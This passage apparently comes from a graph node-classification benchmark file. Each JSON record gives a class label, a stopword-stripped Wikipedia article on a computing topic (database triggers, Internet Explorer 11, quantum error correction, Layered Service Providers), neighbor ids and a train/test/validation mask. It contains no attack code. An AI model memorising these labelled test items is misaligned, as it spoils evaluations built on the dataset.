current implementation easily extensible functions written c",
    "neighbors": [
      3904,
      9345,
      10083,
      4069,
      11625,
      5168,
      11219,
      1976,
      5081,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2775,
    "label": 5,
    "text": "DRDA:drda distributed relational database architecture drda database interoperability standard open group drda describes architecture distributed relational databases defines rules accessing distributed data provide actual application programming interfaces apis perform access first used db2 2.3 drda designed work group within ibm period 1988 1994 messages protocols structural components drda defined distributed data management architecture",
    "neighbors": [
      6850,
      9286,
      10438,
      10280,
      2314,
      7053,
      10413,
      8975,
      2901,
      4630,
      6651,
      5051,
      3388,
      4255
    ],
    "mask": "None"
  },
  {
    "node_id": 2776,
    "label": 3,
    "text": "Ace_of_Aces_(video_game):ace aces video game ace aces combat flight simulator developed artech digital entertainment published 1986 three different companies accolade u.s. gold tiertex design studios released amstrad cpc atari 8-bit family atari 7800 commodore 64 msx ms-dos master system zx spectrum set world war ii player flies raf mosquito long range fighter-bomber equipped rockets bombs cannon missions include destroying german fighter planes bombers v-1 flying bombs u-boats trains 1988 atari corporation released version cartridge styled then-new atari xegs ace aces received mixed reviews went become one best-selling commodore 64 video games published accolade upon launching game menu screen options either practice partake proper mission shown player decides practice mode choose whether dog fight training u-boat train bombing playing practice mode enemies less aggressive five different view options — cockpit left right wings navigational map bomb bay — accessed using keyboard double-tapping fire button moving joystick desired direction missions player controls twin-engined balsa raf mosquito already airborne mitigating necessity takeoff starting mission player chooses supplies wish bring player brings lower maximum speed plane end missions landing required points awarded according many enemies shot along amount unused fuel bombs missiles missions completed player choose combine two missions produce mashup 1987 compute article ace aces noted accolade second best selling commodore 64 game compute along reviewers praised graphics sound ace aces 1991 1993 computer gaming world surveys strategy war games gave one half stars five calling somewhat ahistorical issue 20 zzap 64 reviewer said best factual war simulation played compared dambusters said playability better desert fox also used comparison referred sometimes unbelievable article computer video games magazine published 1986 said another well-made well-presented game accolade continued say action-packed gameplay would able keep even critical computer pilot busy time come four criteria highly rated graphics getting 10 along sound value playability getting 8 graphics along sound features highly praised commodore 64 version n't highly acclaimed master system version chad reinhardt defunct games mentioned ace aces starts potential poor controls lack ability interact plane makes forgettable reinhardt criticised different practise mode main game continued adding little help actually helps attempting missions gave game d+ overall reviewers commented feeling excitement playing sega version review kultboy given rating 20 said reasoning behind low review plane meant fighter plane flies like tanker comparatively score graphics game given high 68 sega pro gave game rating 56 praised graphics static continued say impractical in-game zx spectrum version met reviews disliking complexity changing controls may distracting dogfight issue 38 sinclair reviewers ben stone paul sumner mike dunn criticised difficulty game game contains enough gameplay days steve panak writing analog computing preferred ace aces infiltrator atari 8-bit flight simulator",
    "neighbors": [
      7314,
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 2777,
    "label": 2,
    "text": "Internet_Explorer_11:internet explorer 11 internet explorer 11 ie11 eleventh final version internet explorer web browser microsoft officially released october 17 2013 windows 8.1 november 7 2013 windows 7 browser also shipped windows 10 release july 29 2015 microsoft edge default browser version windows default browser shipped windows server 2016 windows server 2019 january 12 2016 recent version internet explorer offered installation given windows operating system continue supported security updates lasting end support lifecycle windows operating system windows 7 8.1 internet explorer 11 receive security updates remainder windows versions support lifecycles internet explorer 10 reach end support january 31 2020 ie 11 supported version internet explorer windows server 2012 windows embedded 8 standard ie 11 available piloting windows server 2012 windows embedded 8 standard starting spring 2019 ie11 features redesigned developer tools support webgl enhanced scaling high dpi screens prerender prefetch launch ie11 got support http/2 addition ie11 supports full screen orientation apis css border image support javascript enhancements dom mutation observers web cryptography api video text track support encrypted media support improved html editor ie11 uses transport layer security v1.2 default protocol secure connections deprecates rc4 cipher suite internet explorer 11 windows rt support java add-ons november 2013 review sitepoint ie11 scored better google chrome 30 firefox 26 webkit sunspider test google webgl test tied chrome fastest microsoft fish aquarium benchmark webgl came last google v8 performance benchmark result speed improvements reviewer said switched chrome speed alone 're using wrong browser ie11 also observed use less memory multiple tabs open contemporary versions chrome firefox august 2015 sitepoint benchmarked ie11 review microsoft edge edge 12 chrome 44 firefox 39 also present ie11 came last apple jetstream test replaced sunspider google octane test replaces v8 came second microsoft fish aquarium test edge though internal build ie11 leaked march 25 2013 first preview version formally released june 2013 build 2013 conference along preview release windows server 2012 r2 windows 8.1 july 25 2013 microsoft released developer preview internet explorer 11 windows 7 windows server 2008 r2 releases internet explorer update windows 7 8.1 released april 2 2014 added enterprise mode improved developer tools improved support webgl ecmascript 5.1",
    "neighbors": [
      6657,
      9736,
      2579,
      6171,
      7708,
      9757,
      7713,
      10791,
      9770,
      10282,
      5677,
      559,
      4661,
      3639,
      10808,
      64,
      5707,
      9808,
      11345,
      10834,
      6231,
      8281,
      603,
      6747,
      8296,
      1642,
      9834,
      9328,
      115,
      9843,
      119,
      4728,
      637,
      1664,
      5765,
      6797,
      10910,
      8351,
      7340,
      9908,
      11449,
      4797,
      9408,
      7364,
      11466,
      7885,
      4816,
      4310,
      8923,
      4316,
      11487,
      737,
      4326,
      4331,
      4844,
      9964,
      8443,
      9987,
      5380,
      7943,
      1807,
      790,
      3350,
      7965,
      11559,
      1834,
      10026,
      11060,
      10057,
      11112,
      8557,
      6528,
      3971,
      3462,
      8584,
      9609,
      6028,
      7572,
      4505,
      5026,
      11683,
      5054,
      7106,
      9167,
      4048,
      5078,
      11223,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5114,
      2046
    ],
    "mask": "Train"
  },
  {
    "node_id": 2778,
    "label": 2,
    "text": "QuickStart:quickstart quickstart loading method used several different software applications designed speed loading time software load core files libraries computer startup allows applications start quickly selected later quickstarters typically place icon system tray full application needs loaded base components already ram significantly reduces load time quickstarters controversial use ram even application open reason quickstarters actually decrease performance whole example six applications load quickstarter system tray 50 megabytes per piece 300 megabytes ram could otherwise used working applications user 256 megabytes ram cause running applications page virtual memory drastically reduce performance hand user one gigabyte ram running applications probably paged load times quickstart applications reduced resulting higher overall performance point user powers system system ready use delayed system must incur performance penalty form reading quickstart applications hard drive additional cpu processing sub-system usage quickstart application loaded memory following examples applications use quickstart method quickstarters workaround poor performance hard disk drives hdds traditionally standard desktop computers solid-state drives ssds lower latency faster seek times hdds less need quickstarters ssds ssd slowly becoming popular certain types computers business setting quickstart also informal often short description accomplish specific task generally meant help non-experts leave details important experts may also greatly simplified overall discussion topic",
    "neighbors": [
      1577,
      3562,
      11539,
      4926
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2779,
    "label": 4,
    "text": "Information_sensitivity:information sensitivity information sensitivity control access information knowledge might result loss advantage level security disclosed others loss misuse modification unauthorized access sensitive information adversely affect privacy welfare individual trade secrets business even security international relations nation depending level sensitivity nature information refers information already matter public record knowledge regard government private organizations access release information may requested member public often formal processes laid accessibility government-held public records important part government transparency accountability citizens values democracy public records may furthermore refer information identifiable individuals considered confidential including limited census records criminal records sex offender registry files voter registration includes business information subjected special protection may routinely shared anyone inside outside business confidential information used general sense mean sensitive information whose access subject restriction may refer information individual well pertains business however situations release personal information could negative effect owner example person trying avoid stalker inclined restrict access personal information furthermore person ssn sin credit card numbers financial information may considered private disclosure might lead crimes identity theft fraud types private information including records person health care education employment may protected privacy laws unauthorized disclosure private information make perpetrator liable civil remedies may cases subject criminal penalties even though often used interchangeably personal information sometimes distinguished private information personally identifiable information latter distinct former private information used identify unique individual personal information hand information belonging private life individual used uniquely identify individual range individual ’ favourite colour details domestic life latter common example personal information also regarded sensitive individual sharing details trusted listener would prefer shared anyone else sharing may result unwanted consequences confidential business information refers information whose disclosure may harm business information may include trade secrets sales marketing plans new product plans notes associated patentable inventions customer supplier information financial data classified information generally refers information subject special security classification regulations imposed many national governments disclosure may cause harm national interests security protocol restriction imposed upon information categorized hierarchy classification levels almost every national government worldwide restricted levels containing information may cause greatest danger national security leaked authorized access granted individuals need know basis also passed appropriate level security clearance classified information reclassified different level declassified made available public depending changes situation new intelligence classified information may also denoted method communication access example protectively marked secret eyes protectively marked secret encrypted transfer indicating document must physically read recipient openly discussed example telephone conversation communication sent using encrypted means often mistakenly listed meaning eyes intended recipient anomaly becomes apparent additional tag within windowed area also used data privacy concerns exist various aspects daily life wherever personal data stored collected internet medical records financial records expression political opinions 80 countries world personally identifiable information protected information privacy laws outline limits collection use personally identifiable information public private entities laws usually require entities give clear unambiguous notice individual types data collected reason collection planned uses data consent-based legal frameworks explicit consent individual required well european union data protection directive provides rigorous standard privacy protection legislation across member states although directive legally binding member states expected enact national privacy legislation within three years directive ’ adoption conforms standards since adoption directive demonstrated significant influence privacy legislation non-eu nations requirements privacy laws non-member nations engaging transborder flows private data eu member nations eu passed general data protection regulation gdpr replace directive regulation adopted 27 april 2016 becomes enforceable 25 may 2018 two-year transition period unlike directive require national governments pass enabling legislation thus directly binding applicable proposed new eu data protection regime extends scope eu data protection law foreign companies processing data eu residents provides harmonisation data protection regulations throughout eu thereby making easier non-european companies comply regulations however comes cost strict data protection compliance regime severe penalties 4 worldwide turnover gdpr also brings new set digital rights eu citizens age economic value personal data increasing digital economy canada personal information protection electronic documents act pipeda regulates collection use personal data electronic documents public private organizations pipeda effect federal provincial jurisdictions except provinces existing privacy laws determined “ substantially similar ” even though unified sensitive information framework united states implemented significant amount privacy legislation pertaining different specific aspects data privacy emphasis privacy healthcare financial e-commerce educational industries federal state levels whether regulated self regulated laws require establish ways access sensitive information limited people different roles thus essence requiring establishment sensitive data domain model mechanisms protection domains guideline form pre-defined models safe harbor hipaa based research latanya sweeny established privacy industry metrics additionally many countries enacted legislature regarding data privacy protection still process confidentiality sensitive business information established non-disclosure agreements legally binding contract two parties professional relationship ndas may one-way case employee receiving confidential information employing organization two-way businesses needing share information one another accomplish business goal depending severity consequences violation non-disclosure may result employment loss loss business client contacts criminal charges civil lawsuit hefty sum damages ndas signed employer employee initiation employment non-compete clause may part agreement added protection sensitive business information employee agrees work competitors start competing business within certain time geographical limit unlike personal private information internationally recognized framework protecting trade secrets even agreed-upon definition term “ trade secret ” however many countries political jurisdictions taken initiative account violation commercial confidentiality criminal civil laws example us economic espionage act 1996 federal crime united states misappropriate trade secrets knowledge benefit foreign power injure owner trade secret commonly breach commercial confidentiality falls civil law united kingdom developing countries trade secret laws either non-existent poorly developed offer little substantial protection many countries unauthorized disclosure classified information criminal offence may punishable fines prison sentence even death penalty depending severity violation less severe violations civil sanctions may imposed ranging reprimand revoking security clearance subsequent termination employment whistleblowing intentional disclosure sensitive information third-party intention revealing alleged illegal immoral otherwise harmful actions many examples present former government employees disclosing classified information regarding national government misconduct public media spite criminal consequences await espionage spying involves obtaining sensitive information without permission knowledge holder use spies part national intelligence gathering countries used political strategy nation-states since ancient times unspoken knowledge international politics countries spying one another time even allies computer security information security applied computing network technology significant ever-growing field computer science term computer insecurity hand concept computer systems inherently vulnerable attack therefore evolving arms race exploit existing vulnerabilities security systems must engineer new mechanisms security number security concerns arisen recent years increasing amounts sensitive information every level found primary existence digital form personal level credit card fraud internet fraud forms identity theft become widespread concerns individuals need aware day-to-day basis existence large databases classified information computer networks also changing face domestic international politics cyber-warfare cyber espionage becoming increasing importance national security strategy nations around world estimated 120 nations around world currently actively engaged developing deploying technology purposes philosophies internet cultures open-source governance hacktivism popular hacktivist slogan information wants free reflects cultural shifts perception towards political government secrecy popular controversial wikileaks one many manifestations growing cultural sentiment becoming additional challenge security integrity classified information",
    "neighbors": [
      6494,
      2818,
      3619,
      4194,
      2534,
      3495,
      9000,
      9901,
      11695,
      2737,
      5404,
      6902,
      8471,
      9688,
      3516,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2780,
    "label": 1,
    "text": "Database_trigger:database trigger database trigger procedural code automatically executed response certain events particular table view database trigger mostly used maintaining integrity information database example new record representing new worker added employees table new records also created tables taxes vacations salaries triggers also used log historical data example keep track employees previous salaries follows series descriptions popular dbms support triggers addition triggers fire execute pl/sql code data modified oracle 10g supports triggers fire schema-level objects tables modified user logon logoff events occur four main types triggers oracle 8i database events logons logoffs startups fire oracle triggers full list available msdn performing conditional actions triggers testing data following modification done accessing temporary inserted deleted tables introduced support triggers 1997 following functionality previously implemented postgresql synopsis firebird supports multiple row-level insert update delete combination thereof triggers per table always addition default table changes order triggers relative specified would otherwise ambiguous position clause triggers may also exist views always instead triggers replacing default updatable view logic version 2.1 triggers views deemed updatable would run addition default logic firebird raise mutating table exceptions like oracle triggers default nest recurse required sql server allows nesting recursion default firebird triggers use new old context variables inserted deleted tables provide updating inserting deleting flags indicate current usage trigger version 2.1 firebird additionally supports following database-level triggers database-level triggers help enforce multi-table constraints emulate materialized views exception raised transaction commit trigger changes made trigger far rolled back client application notified transaction remains active commit never requested client application continue make changes re-request commit syntax database triggers ibm db2 distributed systems known db2 luw luw means linux unix windows supports three trigger types trigger trigger instead trigger statement level row level triggers supported triggers operation table firing order determined trigger creation data since version 9.7 ibm db2 supports autonomous transactions trigger checking data deciding operation permitted exception thrown trigger operation aborted data changed db2 triggers read — ca n't modify data triggers triggers designed post processing requested change performed triggers write data tables unlike databases write table including table trigger operates instead triggers making views writeable triggers usually programmed sql pl language sqlite supports row-level triggers statement-level triggers updateable views supported sqlite emulated instead triggers example implementation triggers non-relational database sedna provides support triggers based xquery triggers sedna designed analogous triggers natively base xml query update languages xpath xquery xml update language trigger sedna set nodes xml document stored database nodes updated trigger automatically executes xquery queries updates specified body example following trigger cancels person node deletion open auctions referenced person understand trigger behavior works need aware two main types triggers row statement level triggers distinction two many times code within trigger executed time suppose trigger made called update certain table row level triggers would execute row affected update important keep mind rows affected update command trigger execute code within trigger statement level triggers called regardless many rows affected update important note even update command n't affect rows code within trigger still executed using options determine trigger called suppose trigger called insert certain table trigger using option code within trigger executed insert table occurs common use trigger verify input values insert modify values accordingly let say trigger uses instead code within trigger executed insert happens table example use trigger creating audit history made inserts database keeping track changes made using options need keep things mind option allow modify tables input validation practical use using triggers allows modify tables inserting audit history table creating trigger determine statement row level simply include row clause row level omit clause statement level cautious using additional insert/update/delete commands within trigger trigger recursion possible causing unwanted behavior examples trigger modifying different table looking modified see common applications different trigger types used oracle syntax example row level trigger called update row affected trigger called update phone book database trigger called adds entry separate table named phone_book_audit also take note triggers able take advantage schema objects like sequences example audit_id_sequence.nexval used generate unique primary keys phone_book_audit table calling update phone_book table people last name 'jones /div g notice phone_number_audit table populated two entries due database two entries last name 'jones since update modified two separate row values created trigger called twice modification oracle syntax statement trigger called update phone_book table trigger gets called makes insert phone_book_edit_history table lets exactly update example however time statement level trigger /div see trigger called even though update change two rows example row trigger modifies insert using conditional last name larger 10 letters using substr function change last_name column value abbreviation lets perform insert someone large name /div see trigger worked modifying value insert executed using statement trigger particularly useful enforcing database restrictions example going enforce restriction upon someone named someuser table phone_book someuser logged attempting insert error message show custom errors one restriction num variable defined numerous pre-defined errors variable must range -20000 -20999",
    "neighbors": [
      8201,
      9225,
      2068,
      4630,
      1049,
      5658,
      9248,
      10793,
      10286,
      8762,
      11324,
      9286,
      2632,
      9290,
      7756,
      8788,
      10326,
      7767,
      9828,
      10340,
      8295,
      8808,
      2669,
      6775,
      1146,
      3196,
      9360,
      10389,
      4255,
      4263,
      9389,
      10413,
      9397,
      3254,
      7868,
      6850,
      5827,
      2246,
      734,
      10471,
      6383,
      7412,
      8979,
      7446,
      11030,
      5403,
      2344,
      1341,
      10048,
      2369,
      5953,
      2901,
      10069,
      8539,
      8028,
      7523,
      7022,
      9075,
      10628,
      10632,
      2456,
      9112,
      10137,
      9631,
      9634,
      1447,
      7080,
      5546,
      5051,
      3004,
      3525,
      9177,
      987,
      4065,
      6124,
      2544,
      10737
    ],
    "mask": "None"
  },
  {
    "node_id": 2781,
    "label": 3,
    "text": "Quantum_error_correction:quantum error correction quantum error correction qec used quantum computing protect quantum information errors due decoherence quantum noise quantum error correction essential one achieve fault-tolerant quantum computation deal noise stored quantum information also faulty quantum gates faulty quantum preparation faulty measurements classical error correction employs redundancy simplest way store information multiple times and—if copies later found disagree—just take majority vote e.g suppose copy bit three times suppose noisy error corrupts three-bit state one bit equal zero two equal one assume noisy errors independent occur probability p likely error single-bit error transmitted message three ones possible double-bit error occurs transmitted message equal three zeros outcome less likely outcome copying quantum information possible due no-cloning theorem theorem seems present obstacle formulating theory quantum error correction possible spread information one qubit onto highly entangled state several physical qubits peter shor first discovered method formulating quantum error correcting code storing information one qubit onto highly entangled state nine qubits quantum error correcting code protects quantum information errors limited form classical error correcting codes use syndrome measurement diagnose error corrupts encoded state reverse error applying corrective operation based syndrome quantum error correction also employs syndrome measurements perform multi-qubit measurement disturb quantum information encoded state retrieves information error syndrome measurement determine whether qubit corrupted one outcome operation syndrome tells us physical qubit affected also several possible ways affected latter counter-intuitive first sight since noise arbitrary effect noise one distinct possibilities codes effect either bit flip sign phase flip corresponding pauli matrices x z reason measurement syndrome projective effect quantum measurement even error due noise arbitrary expressed superposition basis operations—the error basis given pauli matrices identity syndrome measurement forces qubit decide certain specific pauli error happened syndrome tells us let pauli operator act corrupted qubit revert effect error syndrome measurement tells us much possible error happened nothing value stored logical qubit—as otherwise measurement would destroy quantum superposition logical qubit qubits quantum computer repetition code works classical channel classical bits easy measure repeat stops case quantum channel due no-cloning theorem longer possible repeat single qubit three times overcome different method so-called three-qubit bit flip code used technique uses entanglement syndrome measurements comparable performance repetition code consider situation want transmit state single qubit formula_1 noisy channel formula_2 let us moreover assume channel either flips state qubit probability formula_3 leaves unchanged action formula_2 general input formula_5 therefore written formula_6 let formula_7 quantum state transmitted error correcting protocol place transmitted state correctly transmitted probability formula_8 however improve number encoding state greater number qubits way errors corresponding logical qubits detected corrected case simple three-qubit repetition code encoding consists mappings formula_9 formula_10 input state formula_1 encoded state formula_12 mapping realized example using two cnot gates entangling system two ancillary qubits initialized state formula_13 encoded state formula_14 passed noisy channel channel acts formula_14 flipping subset possibly empty qubits qubit flipped probability formula_16 single qubit flipped probability formula_17 two qubits flipped probability formula_18 three qubits flipped probability formula_19 note assumption channel made assume formula_2 acts equally independently three qubits state encoded problem detect correct errors without time corrupting transmitted state let us assume simplicity formula_3 small enough probability single qubit flipped negligible one detect whether qubit flipped without also querying values transmitted asking whether one qubits differs others amounts performing measurement four different outcomes corresponding following four projective measurements formula_22this achieved example measuring formula_23 formula_24 reveals qubits different others without time giving information state qubits outcome corresponding formula_25 obtained correction applied outcome corresponding formula_26 observed pauli x gate applied formula_27-th qubit formally correcting procedure corresponds application following map output channel formula_28note procedure perfectly corrects output zero one flips introduced channel one qubit flipped output properly corrected example first second qubits flipped syndrome measurement gives outcome formula_29 third qubit flipped instead first two assess performance error correcting scheme general input study fidelity formula_30 input formula_14 output formula_32 output state formula_33 correct one qubit flipped happens probability formula_34 write formula_35 dots denote components formula_33 resulting errors properly corrected protocol follows formula_37this fidelity compared corresponding fidelity obtained error correcting protocol used shown equal formula_38 little algebra shows fidelity error correction greater one without formula_39 note consistent working assumption made deriving protocol formula_3 small enough flipped bits kind error classical computer another possibility error quantum computers sign flip transmission channel relative sign formula_41 formula_42 become inverted instance qubit state formula_43 may sign flip formula_44 original state qubit formula_45 changed state formula_46 hadamard basis bit flips become sign flips sign flips become bit flips let formula_47 quantum channel cause one phase flip bit flip code recover formula_48 transforming hadamard basis transmission formula_47 error channel may induce either bit flip sign flip possible correct types errors using one code shor code fact shor code corrects arbitrary single-qubit errors let formula_50 quantum channel arbitrarily corrupt single qubit 1st 4th 7th qubits sign flip code three group qubits 1,2,3 4,5,6 7,8,9 designed bit flip code shor code qubit state formula_51 transformed product 9 qubits formula_52 bit flip error happens qubit syndrome analysis performed set states 1,2,3 4,5,6 7,8,9 correct error three bit flip group 1,2,3 4,5,6 7,8,9 considered three inputs shor code circuit reduced sign flip code means shor code also repair sign flip error single qubit shor code also correct arbitrary errors bit flip sign flip single qubit error modeled unitary transform u act qubit formula_48 formula_56 described form formula_58 formula_59 formula_60 formula_61 complex constants identity pauli matrices given u equal error occurs formula_65 bit flip error occurs formula_66 sign flip error occurs formula_67 bit flip error sign flip error occur due linearity follows shor code correct arbitrary 1-qubit errors several proposals made storing error-correctable quantum information bosonic modes unlike two-level system oscillator infinitely many energy levels single physical system example cat code followed shortly gottesman-kitaev-preskill gkp states recently binomial code insight offered codes take advantage redundancy within single system rather duplicate many two-level qubits written fock basis simplest binomial encoding formula_68 subscript l indicates logically encoded state dominant error mechanism system stochastic application bosonic lowering operator formula_69 corresponding error states formula_70 formula_71 respectively since codewords involve even photon number error states involve odd photon number errors detected measuring photon number parity system general quantum code quantum channel formula_72 subspace formula_73 formula_74 state hilbert space exists another quantum channel formula_75 formula_76 formula_77 orthogonal projection onto formula_78 formula_75 known correction operation non-degenerate code one different elements set correctable errors produce linearly independent results applied elements code distinct set correctable errors produce orthogonal results code considered pure time researchers come several codes codes allow indeed quantum computations arbitrary length content threshold theorem found michael ben-or dorit aharonov asserts correct errors concatenate quantum codes css codes—i.e re-encode logical qubit code logarithmically many levels— provided error rate individual quantum gates certain threshold otherwise attempts measure syndrome correct errors would introduce new errors correct late 2004 estimates threshold indicate could high 1-3 provided sufficiently many qubits available several experimental realizations css-based codes first demonstration nmr qubits subsequently demonstrations made linear optics trapped ions superconducting transmon qubits error correcting codes also implemented one aimed correcting photon loss dominant error source photonic qubit schemes",
    "neighbors": [
      2273,
      8514,
      9801,
      74,
      11209,
      6798,
      8688,
      3698,
      10452,
      2680,
      7164
    ],
    "mask": "None"
  },
  {
    "node_id": 2782,
    "label": 2,
    "text": "Media_Control_Interface:media control interface media control interface — mci short — high-level api developed microsoft ibm controlling multimedia peripherals connected microsoft windows os/2 computer cd-rom players audio controllers mci makes simple write program play wide variety media files even record sound passing commands strings uses relations described windows registries mci section file system.ini one advantage api mci commands transmitted programming language scripting language open script lingo aso example commands mcisendcommand mcisendstring mci interface phased favor directx apis first released 1995 media control interface consists 7 parts so-called mci devices e.g cd-rom vcd player play certain type files e.g avivideo plays .avi files cdaudio plays cd-da tracks among others mci devices also made available time play type media needs initialized correctly using mci commands commands subdivided categories full list mci commands found microsoft msdn library",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      5225,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      4321,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      3323,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 2783,
    "label": 2,
    "text": "Layered_Service_Provider:layered service provider layered service provider lsp deprecated feature microsoft windows winsock 2 service provider interface spi layered service provider dll uses winsock apis attempt insert tcp/ip protocol stack stack layered service provider intercept modify inbound outbound internet traffic allows processing tcp/ip traffic taking place internet applications accessing internet web browser email client etc. example could used malware redirect web browers rogue websites block access sites like windows update alternatively computer security program could scan network traffic viruses threats winsock service provider interface spi api provides mechanism layering providers top winsock lsps available range useful purposes including parental controls web content filtering parental controls web filter windows vista lsp layering order providers kept winsock catalog unlike well-known winsock 2 api covered numerous books documentation samples winsock 2 spi relatively unexplored winsock 2 spi implemented network transport service providers namespace resolution service providers winsock 2 spi used extend existing transport service provider implementing layered service provider example quality service qos windows 98 windows 2000 implemented lsp tcp/ip protocol stack another use lsps would develop specialized url filtering software prevent web browsers accessing certain sites regardless browser installed desktop winsock 2 spi allows software developers create two different types service providers—transport namespace transport providers commonly referred protocol stacks services supply functions set connections transfer data exercise flow control error control namespace providers services associate addressing attributes network protocol one human-friendly names enable protocol-independent name resolution spi also allows develop two types transport service providers—base layered service providers base service providers implement actual details transport protocol setting connections transferring data exercising flow control error control layered service providers implement higher-level custom communication functions rely existing underlying base provider actual data exchange remote endpoint winsock 2 lsps implemented windows dlls single exported entry function wspstartup transport spi functions made accessible ws2_32.dll upper chain layered provider via lsp dispatch table lsps base providers strung together form protocol chain lsp dll registered using special lsp registrant instructs winsock 2 loading order lsps one lsp installed protocols intercept lsps work intercepting winsock 2 commands processed ws2_32.dll therefore modify commands drop command log data makes useful tool malware network filters network intercepters stream based sniffers sniffing network traffic lsp sometimes troublesome since anti-virus vendors typically flag activity malicious — network packet analyzer therefore better alternative capturing network traffic feature lsp winsock proxy sniffing allow traffic captured single application also enable traffic going localhost 127.0.0.1 sniffed windows two kinds lsp ifs non ifs lsp currently lsps market non ifs difference two lsps non ifs lsps modify socket handle non valid windows ifs handle therefore lsp must implement winsock 2 methods ifs lsps hand preserve socket handle allows lsp implement functions wants intercept ifs lsps much less performance impact non ifs lps limited fact inspect modify data receive path lsps deprecated since windows server 2012 systems include lsps pass windows logo checks windows 8 style metro apps use networking automatically bypass lsps windows filtering platform provides similar functionality compatible windows 8 style metro apps conventional desktop applications major issue lsps bugs lsp cause applications break example lsp returns wrong number bytes sent interface cause applications go infinite loop waiting network stack indicate data sent another major common issue lsps removed unregistered improperly lsp buggy would result corruption winsock catalog registry entire tcp/ip stack would break computer could longer access network lsp technology often exploited spyware adware programs order intercept communication across internet example malware may insert lsp network stack forward user traffic unauthorized external site data-mined find user interests bombard him/her targeted advertisements well spam e-mail malware lsp removed correctly older versions windows may left without working network connection potential loss network connectivity prevented windows xp service pack 2 windows server 2003 service pack 1 later windows operating systems winsock ability self-heal user uninstalls lsp installed lsps viewed using xp/vista windows defender software explorer using third-party utilities",
    "neighbors": [
      10243,
      9234,
      1043,
      9746,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      8753,
      8246,
      4178,
      9813,
      603,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      3224,
      10392,
      4771,
      2213,
      7846,
      10414,
      8391,
      214,
      9434,
      736,
      4321,
      6370,
      9440,
      4836,
      1770,
      11498,
      3821,
      10991,
      6927,
      5401,
      5913,
      11546,
      4384,
      2854,
      10024,
      10026,
      10029,
      11570,
      5952,
      1348,
      844,
      7515,
      10079,
      11616,
      877,
      2943,
      9609,
      8080,
      10654,
      8607,
      6584,
      2493,
      7629,
      8161,
      6114,
      2027,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 2784,
    "label": 7,
    "text": "Cherrypal:cherrypal cherrypal california-based marketer chinese-manufactured consumer-oriented computers markets range models diversity cpu-types structures features operating systems commentators observed cherrypal arguably beat heralded much-better financed one laptop per child olpc project goal 100 laptop units physically small cherrypal unit general purchase 99 plus shipping 7 screen olpc provided child developing world 199 7.5 company business practices generated controversy antipathy vocally dissatisfied customers others marginally satisfied practices pertaining merchandise returns communication repeatedly faulted u.s better business bureau rating cherrypal f indicating bbb strongly questions company ’ reliability cherrypal claims commitment environmental concerns needs impoverished countries particular key sponsorship learning center ghana supports one laptop per teacher pilot program nigeria order company marketed c114 ppc-processor-based nettop cherrypal bing x86-based netbook cherrypal africa xburst-cpu-based netbook cherrypal asia arm-processor-based netbooks cherrypad america arm-processor-based tablet computer cherrypal c114 small light nettop computer using powerpc-processor freescale 5121e system-on-a-chip soc integrated main-board xubuntu operating system device launches firefox minefield web-browser abiword word-processor apps via icon double-click article register noted cherrypal producers asserted computer consume 2 watts power independent informal testing shown wattage consumption still low 6.9 watts booting cherrypal c114 rebadged version limepc d1 mini-desktop computer developed part broader freescale powerpc chip-based product line thtf shenzhen r center shown public 2008 ces las vegas january 2008 cherrypal bing slim x86-based netbook ships windows xp cherrypal 99 netbook africa aimed primarily developing world also available sale consumers according blog post max seybold device specs cherrypal web store kept intentionally vague africa built set design instead cherrypal either purchases pre-made netbook systems buys odd lots whatever inexpensive components available builds netbooks rebrands netbooks africas 99 computer named africa honor paajaf humanitarian services group based ghana west-africa seybold states resulting device minimum meet specs listed website could also exceed could also end arm mips x86-based cpu architecture depending chips available interview seybold stated africa meant sold computer traditional sense appliance provide internet access people could afford buy traditional computer said number government services unemployment disability encouraging access internet lack access becoming disability thing cherrypal promises 99 ability access internet cherrypal asia low cost arm-based netbook uses android os version 1.7 cherrypal america also known cherrypad android tablet based upon telechips tcc89xx arm11 processors cherrypal initially sold tablet promise upgrade android 2.2 november support android market market support officially removed tablet conform market requirements google also android 2.2 upgrade canceled instead cherrypal promises update android 2.3 hardware cherrypal america listed cherrypal comprises 800 mhz arm11 cpu telechips 256 mb ddr2 ram 2 gb flash memory 800x480 resistive touchscreen however user report arguing less powerful specifications according boot-log dumped via dmesg according various android news magazines cherrypal announced successor current cherrypad cherrypal founded max seybold based palo alto c114 following c120 desktop computers originally developed tsinghua tongfang thtf shenzhen r center engineering team led american electronics industry veterans jack campbell ryan quinn extended line handheld desktop tv-based pcs using freescale mpc5121e powerpc microprocessor shown ces 2008 thtf desktop product picked thereafter oem purchase cherrypal cherrypal marketers planned use firefox web-browser also user interface launch applications openoffice.org planned cherrypal would make use cloud computing applications storage would wholly part internet-based plans yet implemented company president asserted cloud green maraschino would launched february 2010 however known occurred",
    "neighbors": [
      1537,
      3585,
      2308,
      1682,
      405,
      10393,
      5019,
      6178,
